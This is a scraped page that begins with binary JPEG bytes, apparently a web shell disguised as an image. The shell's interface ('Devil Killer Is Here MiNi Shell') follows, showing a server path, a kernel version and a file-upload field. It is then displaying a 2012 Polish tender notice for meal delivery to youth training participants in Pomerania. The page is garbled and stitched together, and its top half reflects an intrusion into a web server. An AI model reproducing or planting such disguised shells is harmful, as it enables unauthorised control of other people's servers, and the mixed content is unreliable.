JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121008/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121008/386164-N-2012.html

<p class="kh_header"><b>Gdańsk: Przygotowanie i dostarczenie wyżywienia uczestnikom zajęć dydaktycznych stanowiącego element realizacji projektu Młodzieżowa Akademia Umiejętności 2 oraz Nowe Perspektywy współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 386164 - 2012; data zamieszczenia: 08.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy - Pomorska Wojewódzka Komenda , ul. J. Uphagena 27, 80-237 Gdańsk, woj. pomorskie, tel. 58 3017916, faks 58 3017916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pomorska.ohp.pl/   http://www.pomorskie.eu/pl/bip/ohp</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja rynku pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i dostarczenie wyżywienia uczestnikom zajęć dydaktycznych stanowiącego element realizacji projektu Młodzieżowa Akademia Umiejętności 2 oraz Nowe Perspektywy współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest przygotowanie i dostarczenie wyżywienia uczestnikom zajęć dydaktycznych stanowiącego element realizacji projektu Młodzieżowa Akademia Umiejętności 2 oraz Nowe Perspektywy współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
2.	Przedmiot zamówienia został podzielony na 5 zadań częściowych w następujący sposób: 

Nowe Perspektywy			
Zadanie nr 1	2012 r.	2013 r.	RAZEM ILOŚĆ POSIŁKÓW
Miejsce realizacji zajęć projektowych oraz miejsce dostarczania usługi wyżywienia: 
11-6 ŚHP w Gdańsku ul. Brzegi 45	20 osób x 52 dni = 1040 posiłków	20 osób x 52 dni = 1040 posiłków	
2080
Zadanie nr 2	2012 r.	2013 r.	RAZEM ILOŚĆ POSIŁKÓW
Miejsce realizacji zajęć projektowych oraz miejsce dostarczania usługi wyżywienia: 
11-12 HP w Gdyni, ul. Śląska 53	20 osób x 52 dni = 1040 posiłków	20 osób x 52 dni = 1040 posiłków	
2080
Zadanie nr 3	2012 r.	2013 r.	RAZEM ILOŚĆ POSIŁKÓW
Miejsce realizacji zajęć projektowych oraz miejsce dostarczania usługi wyżywienia: 
11- 23 ŚHP w Słupsku ul. Dunikowskiego 3	40 osób x 52 dni = 2080 posiłków	40 osób x 52 dni = 2080 posiłków	

8320

Miejsce realizacji zajęć projektowych oraz miejsce dostarczania usługi wyżywienia:  
 CEiPM  w Słupsku ul. Dunikowskiego 3	40 osób x 52 dni = 2080 posiłków	40 osób x 52 dni = 2080 posiłków	
Młodzieżowa Akademia Umiejętności 2			
Zadanie nr 4	2012 r.	2013 r.	RAZEM ILOŚĆ POSIŁKÓW
Miejsce realizacji zajęć projektowych oraz miejsce dostarczania usługi wyżywienia: 
11-5 ŚHP w Lęborku, ul. B. Krzywoustego 1	15 osób x 12 dni = 180 posiłków	15 osób x 10 dni = 150 posiłków	
330
Zadanie nr 5	2012 r.	2013 r.	RAZEM ILOŚĆ POSIŁKÓW
Miejsce realizacji zajęć projektowych oraz miejsce dostarczania usługi wyżywienia: 
11-19 HP w Słupsku, ul. Przemysłowa 100 	15 osób x 12 dni = 180 posiłków	15 osób x 10 dni = 150 posiłków	
330

		

1.	Wyżywienie w ilości jednego posiłku dziennie na uczestnika będzie dostarczane uczestnikom w  trakcie zajęć dydaktycznych na adresy wskazane w w/w tabeli w okresie od dnia zawarcia umowy do 10-12-2013 r.. 
2.	Przez wyżywienie rozumie się ciepły posiłek składający się z:
	- drugiego dania obiadowego (dopuszcza się raz w miesiącu posiłki typu pizza, chińszczyzna lub  inne nietradycyjne danie obiadowe),
	- napoju (ciepłe lub zimne w zależności od pory roku).
3.	Przedmiot zamówienia będzie realizowany dla osób w wieku 15-24 lata.
4.	Posiłki muszą być dostarczone w naczyniach jednorazowych razem z workami na odpady.
5.	Wykonawca jest zobowiązany do przygotowania jednego posiłku dziennie dla każdego z uczestników, przy czym będzie to posiłek ciepły składający się z dania głównego i napoju.
6.	Posiłek zostanie dostarczony przez Wykonawcę w miejsce wskazane przez pracownika Zamawiającego, pełniącego funkcję koordynatora terenowego przy czym w szczególnych przypadkach mogą to  być soboty i niedziele oraz dni wolne od pracy. 
7.	Dokładna ilość zamawianych posiłków określana będzie przez koordynatora terenowego w momencie rozpoczęcia zajęć w danym dniu i uzależniona jest od liczby osób obecnych na zajęciach danego dnia. 
8.	Wykonawca zobowiązany jest do zapewnienia zróżnicowanego menu. Z początkiem miesiąca Wykonawca przekłada do akceptacji koordynatorowi terenowemu jadłospis na dany miesiąc.  
9.	W uzasadnionych przypadkach Wykonawca obowiązany jest zapewnić odrębne menu dla   indywidualnych uczestników (np.: ze względów zdrowotnych, światopoglądowych uczestników)
10.	Wykonawca jest zobowiązany do przygotowania posiłków ze świeżych produktów przy zachowaniu wszelkich norm i wymogów sanitarnych. Wartość kaloryczna powinna być zgodna z obowiązującymi normami żywienia. 
11.	W razie stwierdzenia przez pracownika Zamawiającego niezgodności przygotowania lub dostarczenia posiłku, poczęstunku z normami i wymogami sanitarnymi, Wykonawca zobowiązany jest do niezwłocznego dostarczenia innego posiłku, poczęstunku.  
12.	Wykonawcy przysługuje wynagrodzenie za ilość wydanych posiłków uzależnioną od obecności uczestników na zajęciach.
13.	Dostawa posiłków, poczęstunku do wskazanych miejsc  odbywać się będzie na koszt Wykonawcy.  
14.	Dokładne określenie ilości posiłków i ilości uczestników w każdym dniu będzie możliwe dopiero na etapie praktycznej realizacji projektu. Możliwa jest również sytuacja, kiedy w danym dniu nie będą dostarczane posiłki.
15.	Wykonawca ma obowiązek stosować zróżnicowane menu składające się z posiłków dostarczających podstawowe wartości odżywcze.
16.	Wykonawca przed podpisaniem umowy z Zamawiającym zobowiązany jest dołączyć przykładowy jadłospis na 1 tydzień. 
17.	Zamawiający do SIWZ dołącza umowę powierzania przetwarzania danych osobowych którą wyłoniony wykonawca będzie miał obowiązek podpisać wraz z umową na realizację zamówienia publicznego - załącznik nr 4. 
18.	Zamawiający zastrzega sobie możliwość  zastosowania prawa opcji, tj. możliwość zmniejszenia ilości zamawianych posiłków w stosunku do podanych w formularzu cenowym i SIWZ. Maksymalny zakres przedmiotu zamówienia może zostać pomniejszony o nie więcej niż 70 % ogólnej wartości tzn. zostanie zrealizowany w co najmniej 30 % wartości zamówienia.
19.	Posiłek powinien składać się z co najmniej z:
A.	ziemniaki lub ryż lub kasza lub makaron lub kopytka lub kluski śląskie - 180 gram-  
- sztuka mięsa bez sosu 150 gram lub sztuka mięsa z sosem 160 gram lub kotlet schabowy sosie 130 gam lub kotlet schabowy panierowany 150 gram lub kotlet z piersi kurczaka w panierce 150 gram lub ryba bez panierki 150 gram lub ryba panierowana 170 gram lub udko z kurczaka 150 gram lub kotlet mielony 150 gram lub pulpety 150 gram lub gołąbki 150 gram
B.	 surówka warzywna sezonowa 120 gram,
C.	 napój 200 ml
W przypadku bardziej zróżnicowanego menu gramatura posiłku nie może być mniejsza. 
20.	Do zadań Wykonawcy należy również obsługa i zapewnienie odbioru odpadów pokonsumpcyjnych (pojemników termoizolacyjnych, sztućców) po posiłku. Zamawiający zastrzega sobie możliwość zmiany ilości dostarczonych posiłków (zmniejszenia) w zależności od faktycznie istniejących potrzeb - poprzez telefoniczną informację najpóźniej do godz. 10:00 w dniu planowanego dnia posiłku. Uczestnicy kwitują odbiór posiłku własnoręcznym podpisem. Rozliczenie nastąpi za rzeczywistą ilość dostarczonych posiłków. Ceny zaoferowane przez wykonawcę nie ulegną zmianie przez okres obowiązywania umowy.  
21.	Posiłek powinien być w formie ciepłego dania obiadowego wraz z napojem. Obiad dla każdego uczestnika ma być podany na ciepło w pojemniku termoizolacyjnym (posiadającym  stosowny atest), z kompletem sztućców i serwetek. Należy zadbać o zróżnicowane menu składające się z posiłków dostarczających podstawowych wartości odżywczych. Wykonawca odpowiada za przygotowanie i transport przedmiotu zamówienia zgodnie z obowiązującymi wymaganiami sanitarnymi dotyczącymi żywności i żywienia zbiorowego, dostarcza posiłki do miejsca spożycia zapewniając utrzymanie właściwej jakości i temperatury. Przygotowanie posiłków odbywać się musi wyłącznie na bazie pełnowartościowych produktów wysokiej jakości oraz produktów posiadających stosowne atesty.
22.	Wykonawcy przysługuje wynagrodzenie za ilość wydanych posiłków, uzależnioną od obecności uczestników na zajęciach.
23.	Wykonawca będzie dostarczał do siedziby PWK OHP fakturę/rachunek za dany miesiąc do 5 każdego następnego miesiąca. 
24.	Zamawiający do SIWZ dołącza umowę powierzania przetwarzania danych osobowych  (osobnona MAU 2 i NP), które wyłoniony wykonawca będzie miał obowiązek podpisać wraz z umową na realizację zamówienia publicznego - załącznik nr 4..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1, 55.32.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2. A SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2. A SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2. A SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2. A SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2. A SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W celu wykazania spełnienia warunku udziału w postępowaniu dotyczącego braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp należy złożyć oświadczenie o braku podstaw do wykluczenia z postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust.1 Pzp, wg wzoru na Załączniku nr 3 do SIWZ. 
2.	W celu potwierdzenia spełniania warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy Pzp, do oferty należy dołączyć:
A.	oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp, w związku z art. 44 ustawy Pzp, wzór oświadczenia stanowi Załączniku nr 2 do SIWZ.
B.	Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, będzie polegał na wiedzy i doświadczeniu i/lub na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b) ustawy Pzp., niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnej wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia (w formie oryginału),
UWAGA: W przypadku gdy Wykonawca będzie polegał na wiedzy i doświadczeniu innego podmiotu i/lub będzie polegał na zasobach innego podmiotu i złoży w stosunku do tych warunków pisemne zobowiązanie o którym mowa powyżej - oznacza obowiązkowy udział innego podmiotu w realizacji części zamówienia.
3.	W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust.1 pkt 1-4 PzP składa przynajmniej jeden z Wykonawców lub wszyscy Wykonawcy złożą oświadczenia lub wspólne oświadczenie, że łącznie spełniają te warunki.
4.	Dokumenty, oświadczenia potwierdzające spełnienie warunków udziału w postępowaniu. 
5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia - art. 23 ust. 1 ustawy Pzp. W takim przypadku Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy.
6.	Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich                   w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego i dlatego też zobowiązane są dołączyć do oferty - pełnomocnictwo do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia, albo pełnomocnictwo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania. Przed zawarciem umowy z wykonawcami wspólnie składającymi ofertę należy przedstawić zamawiającemu stosowną umowę współpracy wykonawców
7.	Wykonawcy, występujący wspólnie składają jedną ofertę, przy czym:
A.	Załącznik nr 3 do SIWZ (Oświadczenie Wykonawcy o braku podstaw do wykluczenia) każdy z Wykonawców składa oddzielnie w formie oryginału i podpisuje we własnym imieniu. Dopuszcza się możliwość złożenia na jednym formularzu, w którym będą znajdować się podpisy umocowanych osób wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
B.	Załącznik nr 2 (Oświadczenie Wykonawcy o spełnianiu warunków udziału w  postępowaniu) Wykonawcy składają w formie oryginału i mogą złożyć wspólnie na jednym dokumencie (oświadczenie podpisane przez Pełnomocnika lub przez każdego z Wykonawców odrębnie), lub każdy z nich na osobnym dokumencie.
UWAGA: Do podmiotów wspólnie ubiegających się o zamówienie publiczne stosuje się te same przepisy co do pojedynczego wykonawcy. Odpowiednie ich stosowanie oznacza, że każdy uczestnik wspólnej oferty musi posiadać uprawnienia do wykonywania określonej działalności lub czynności i nie może podlegać wykluczeniu z postępowania. Natomiast przy ocenie spełniania warunków, brany jest pod uwagę łączny potencjał techniczny i kadrowy wykonawców (członków konsorcjum, członków spółki cywilnej) ich łączne kwalifikacje i doświadczenie oraz łączną sytuację ekonomiczną i finansową.
8.	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani przyjąć formę prawną konsorcjum zawiązanego w drodze umowy cywilnej. W tym celu przed podpisaniem umowy o niniejsze zamówienie są oni zobowiązani przedstawić Zamawiającemu stosowne porozumienie zawierające w swojej treści następujące postanowienia:
A.	określenie zasad reprezentacji i odpowiedzialności w sposób czytelny, nie budzący żadnej wątpliwości;
B.	określenie celu gospodarczego;
C.	oznaczenie czasu trwania konsorcjum obejmującego okres realizacji  przedmiotu zamówienia i okres gwarancji;
D.	wykluczenie możliwości wypowiedzenia umowy przez któregokolwiek z jej członków do czasu wykonania zamówienia bez zgody Zamawiającego i upływu  okresu gwarancji;
E.	zakaz dokonywania zmian w umowie bez zgody Zamawiającego.
5.	Koncesję, zezwolenie lub licencję, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwoleń lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym, zwanym dalej zamówieniem. 
6.	W przypadku Wykonawców występujących wspólnie (konsorcjum), oprócz w/w dokumentów należy dołączyć:
A.	Pełnomocnictwo Lidera - pełnomocnika do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o zamówienie, a w szczególności do złożenia oferty lub do złożenia oferty i podpisania umów w imieniu konsorcjum. Fakt ustanowienia pełnomocnika musi wynikać z załączonych do oferty dokumentów (np. pełnomocnictwa). Wypełniając formularz ofertowy, jak również inne dokumenty powołujące się na Wykonawcę, w miejscu nazwa i adres Wykonawcy należy wpisać oprócz danych pełnomocnika konsorcjum, również dane dotyczące wszystkich członków konsorcjum - wszystkich Wykonawców składających ofertę wspólną. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem wymienionym w pełnomocnictwie występującym jako reprezentant pozostałych konsorcjantów.
B.	Oświadczenie wszystkich członków konsorcjum o ich odpowiedzialności solidarnej za zobowiązania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>21.	Zamawiający dopuszcza zmianę postanowień zawartej umowy w zakresie:
A.	Zmian organizacyjnych stron np. zmiana reprezentacji lub siedziby firmy. 
B.	Zmian osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej  umowy. 
C.	W przypadku zmian unormowań prawnych powszechnie obowiązujących np. zmiana urzędowej stawki podatku VAT. Stawki ZUS. W przypadku zmiany obowiązującej stawki podatku VAT, stawki ZUS Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT lub ZUS. Strony dokonają odpowiedniej zmiany wynagrodzenia w przypadku realizacji tej części zamówienia, której w dniu zmiany stawki podatku VAT, stawki ZUS jeszcze nie dokonano.
D.	Zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy.
E.	Zmiany powszechnie obowiązujących  przepisów  prawa  w  zakresie  mającym wpływ na realizację umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pomorskie.eu/pl/bip/ohp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można uzyskać nieodpłatnie  
w godz. od 8oo-15 oo  w siedzibie  Zamawiającego,  pokój nr 610, VI piętro. UL. Uphagena 27, 80-237 Gdańsk,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.10.2012 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie, Zamawiającego, ul. J. Uphagena 27, 
80-237 Gdańsk, (sekretariat - pokój 605) 6 piętro:.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Młodzieżowa Akademia Umiejętności 2 oraz Nowe Perspektywy współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
